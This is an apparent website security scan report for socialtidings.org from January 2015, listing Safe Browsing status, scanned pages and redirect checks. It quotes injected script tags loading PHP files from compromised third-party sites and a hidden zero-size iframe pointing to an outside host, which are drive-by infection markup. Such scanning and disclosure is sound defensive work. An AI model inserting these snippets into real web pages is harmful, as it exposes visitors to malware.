Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=socialtidings.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://socialtidings.org/ | 200 OK Content-Length: 7263 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://villadentalsuite.co.uk/wp-content/themes/twentytwelve/yrcx3myp.php?id=1809385"></script> | ||
https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://socialtidings.org/js/carousel.js | 200 OK Content-Length: 7221 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) r = setTimeout('rotate()', 1) function rotate() { $('.carousel_img_3').delay(10000).fadeOut(2500, function () { $('.carousel_img_2').delay(10000).fadeOut(2500, function () { $('.carousel_img_3').delay(10000).fadeIn(2500, function () { $('.carousel_img_2').show(); g = setTimeout('rotate()', 1); }); }); }); } Antivirus reports:
| ||
http://socialtidings.org/index.html | 200 OK Content-Length: 7263 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://villadentalsuite.co.uk/wp-content/themes/twentytwelve/yrcx3myp.php?id=1809385"></script> | ||
http://socialtidings.org/articles.html | 200 OK Content-Length: 2553 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://villadentalsuite.co.uk/wp-content/themes/twentytwelve/yrcx3myp.php?id=1809383"></script> Hidden iFrame found. The same iFrame was found in 66 websites. size: 0x0 src: http://mbcobretti.com/hydra.php <iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter> | ||
http://socialtidings.org/article_1.html | 200 OK Content-Length: 4170 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://villadentalsuite.co.uk/wp-content/themes/twentytwelve/yrcx3myp.php?id=1809381"></script> Hidden iFrame found. The same iFrame was found in 66 websites. size: 0x0 src: http://mbcobretti.com/hydra.php <iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter> | ||
http://socialtidings.org/articles/the_FTA_insurgency.docx | 404 Not Found Content-Length: 416 Content-Type: text/html | clean |
http://socialtidings.org/test404page.js | 404 Not Found Content-Length: 398 Content-Type: text/html | clean |
http://socialtidings.org/article_2.html | 200 OK Content-Length: 16642 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mariaozawauncensored.net/wp-content/themes/primepress/bwyvnfl9.php?id=1809892"></script> Hidden iFrame found. The same iFrame was found in 66 websites. size: 0x0 src: http://mbcobretti.com/hydra.php <iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter> | ||
http://socialtidings.org/articles/Resolution of contradictory beliefs.docx | 200 OK Content-Length: 21985 Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document | clean |
http://socialtidings.org/contacts.html | 200 OK Content-Length: 3772 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://villadentalsuite.co.uk/wp-content/themes/twentytwelve/yrcx3myp.php?id=1809384"></script> Hidden iFrame found. The same iFrame was found in 66 websites. size: 0x0 src: http://mbcobretti.com/hydra.php <iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: socialtidings.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 07:26:58 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 7263
Content-Type: text/html
...7263 bytes of data.
GET / HTTP/1.1
Host: socialtidings.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 07:26:58 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 7263
Content-Type: text/html
...7263 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: socialtidings.org
Referer: http://www.google.com/search?q=socialtidings.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: socialtidings.org
Referer: http://www.google.com/search?q=socialtidings.org
Result:
The result is similar to the first query. There are no suspicious redirects found.